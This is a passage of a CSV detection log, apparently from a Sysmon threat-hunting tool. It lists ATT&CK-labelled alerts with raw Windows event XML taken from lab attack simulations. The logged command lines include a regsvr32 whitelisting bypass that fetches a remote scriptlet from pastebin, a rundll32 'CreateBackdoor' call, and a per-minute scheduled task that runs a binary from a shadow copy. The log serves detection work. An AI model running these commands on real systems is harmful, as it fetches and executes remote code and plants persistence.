<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
<Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
<Data Name=""ProcessId"">2544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
<Data Name=""ParentProcessId"">3212</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
</TimeCreated>
<EventRecordID>16792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
<Data Name=""ParentProcessId"">3528</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-16T16:08:40.360593Z"">
</TimeCreated>
<EventRecordID>18918</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1744"" ThreadID=""2120"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-05-16 16:08:40.350</Data>
<Data Name=""ProcessGuid"">DFAE8213-8B08-5CDD-0000-001011CE0A00</Data>
<Data Name=""ProcessId"">3764</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">DFAE8213-832F-5CDD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47</Data>
<Data Name=""ParentProcessGuid"">DFAE8213-8B02-5CDD-0000-00109BCA0A00</Data>
<Data Name=""ParentProcessId"">1720</Data>
<Data Name=""ParentImage"">C:\Windows\System32\osk.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\osk.exe&quot; </Data>
</EventData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
</TimeCreated>
<EventRecordID>16792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
<Data Name=""ParentProcessId"">3528</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
</TimeCreated>
<EventRecordID>16792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
<Data Name=""ParentProcessId"">3528</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
</TimeCreated>
<EventRecordID>243538</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
<Data Name=""ProcessId"">2536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-13T00:28:16.122541Z"">
</TimeCreated>
<EventRecordID>148597</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2756"" ThreadID=""3632"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-13 00:28:16.115</Data>
<Data Name=""ProcessGuid"">747F3D96-3F20-5EBB-0000-0010035E3600</Data>
<Data Name=""ProcessId"">8052</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3821-5EBB-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-3821-5EBB-0000-001040690000</Data>
<Data Name=""ParentProcessId"">732</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
</TimeCreated>
<EventRecordID>243538</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
<Data Name=""ProcessId"">2536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T00:35:07.474160Z"">
</TimeCreated>
<EventRecordID>376</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 00:35:07.386</Data>
<Data Name=""ProcessGuid"">365ABB72-47BB-5CE3-0000-00108CAD3E00</Data>
<Data Name=""ProcessId"">3176</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c pause</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-47BB-5CE3-0000-0010BFA83E00</Data>
<Data Name=""ParentProcessId"">1912</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Downloads\com-hijack.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\com-hijack.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
</TimeCreated>
<EventRecordID>243538</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
<Data Name=""ProcessId"">2536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:59.519768Z"">
</TimeCreated>
<EventRecordID>6193</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:59.510</Data>
<Data Name=""ProcessGuid"">365ABB72-FE7B-5CEB-0000-0010867F0C00</Data>
<Data Name=""ProcessId"">4012</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
